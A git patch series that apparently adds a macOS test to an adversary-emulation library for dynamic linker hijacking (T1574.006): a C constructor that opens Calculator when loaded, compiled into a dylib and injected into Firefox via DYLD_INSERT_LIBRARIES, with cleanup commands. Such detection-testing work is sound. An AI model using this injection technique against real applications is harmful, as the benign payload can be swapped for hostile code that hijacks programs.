From 7748526bd441df9bdc69dd40e2d441ea1c1a1228 Mon Sep 17 00:00:00 2001 From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com> Date: Thu, 2 Jun 2022 14:56:00 -0500 Subject: [PATCH 1/4] C file for opening calc --- atomics/T1574.006/MacOS/T1574.006.c | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 atomics/T1574.006/MacOS/T1574.006.c diff --git a/atomics/T1574.006/MacOS/T1574.006.c b/atomics/T1574.006/MacOS/T1574.006.c new file mode 100644 index 00000000..7c2fedb2 --- /dev/null +++ b/atomics/T1574.006/MacOS/T1574.006.c @@ -0,0 +1,8 @@ +#include +#include +int system(const char *command); +__attribute__((constructor)) +static void customConstructor(int argc, const char **argv) +{ +system("open -a Calculator.app"); +} From 3e36aa671fa9a20edee32c48c60ea5e9da804798 Mon Sep 17 00:00:00 2001 From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com> Date: Thu, 2 Jun 2022 14:57:35 -0500 Subject: [PATCH 2/4] MacOS Dylib injection for T1574.006 reference: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74 --- atomics/T1574.006/T1574.006.yaml | 33 ++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) diff --git a/atomics/T1574.006/T1574.006.yaml b/atomics/T1574.006/T1574.006.yaml index 84641ebc..5f9d528d 100644 --- a/atomics/T1574.006/T1574.006.yaml +++ b/atomics/T1574.006/T1574.006.yaml @@ -62,3 +62,36 @@ atomic_tests: command: | LD_PRELOAD=#{path_to_shared_library} ls name: bash +- name: Dylib Injection via DYLD_INSERT_LIBRARIES + description: | + injects a dylib that opens calculator via env variable + supported_platforms: + - macos + input_arguments: + file_to_inject: + description: Path of executable to be injected. Mostly works on non-apple default apps. + type: Path + default: /Applications/Firefox.app/Contents/MacOS/firefox + source_file: + description: Path of c source file + type: Path + default: PathToAtomicsFolder/T1574.006/src/MacOS/T1574.006.c + dylib_file: + description: Path of dylib file + type: Path + default: /tmp/T1574006MOS.dylib + dependency_executor_name: bash + dependencies: + - description: | + The c source must exist on disk at specified location (#{source_file}) + prereq_command: | + if [ -f #{source_file} ]; then exit 0; else exit 1; fi; + get_prereq_command: | + gcc -dynamiclib #{source_file} -o #{dylib_file} + executor: + command: | + DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject} + cleanup_command: | + kill `pgrep Calculator` + name: bash + elevation_required: false From df67a8aa4d96a7c937b07efefbb1cafda07eec62 Mon Sep 17 00:00:00 2001 From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com> Date: Fri, 3 Jun 2022 10:23:25 -0500 Subject: [PATCH 3/4] Fixed not compiling --- atomics/T1574.006/T1574.006.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/atomics/T1574.006/T1574.006.yaml b/atomics/T1574.006/T1574.006.yaml index 5f9d528d..2d1f4c28 100644 --- a/atomics/T1574.006/T1574.006.yaml +++ b/atomics/T1574.006/T1574.006.yaml @@ -83,9 +83,9 @@ atomic_tests: dependency_executor_name: bash dependencies: - description: | - The c source must exist on disk at specified location (#{source_file}) + Compile the dylib from (#{source_file}). Destination is #{dylib_file} prereq_command: | - if [ -f #{source_file} ]; then exit 0; else exit 1; fi; + gcc -dynamiclib #{source_file} -o #{dylib_file} get_prereq_command: | gcc -dynamiclib #{source_file} -o #{dylib_file} executor: @@ -93,5 +93,6 @@ atomic_tests: DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject} cleanup_command: | kill `pgrep Calculator` + kill `pgrep firefox` name: bash elevation_required: false From 40917c1a65493e70578559b247f71f86265907b2 Mon Sep 17 00:00:00 2001 From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com> Date: Tue, 7 Jun 2022 10:36:26 -0500 Subject: [PATCH 4/4] Moved c script --- atomics/T1574.006/{ => src}/MacOS/T1574.006.c | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename atomics/T1574.006/{ => src}/MacOS/T1574.006.c (100%) diff --git a/atomics/T1574.006/MacOS/T1574.006.c b/atomics/T1574.006/src/MacOS/T1574.006.c similarity index 100% rename from atomics/T1574.006/MacOS/T1574.006.c rename to atomics/T1574.006/src/MacOS/T1574.006.c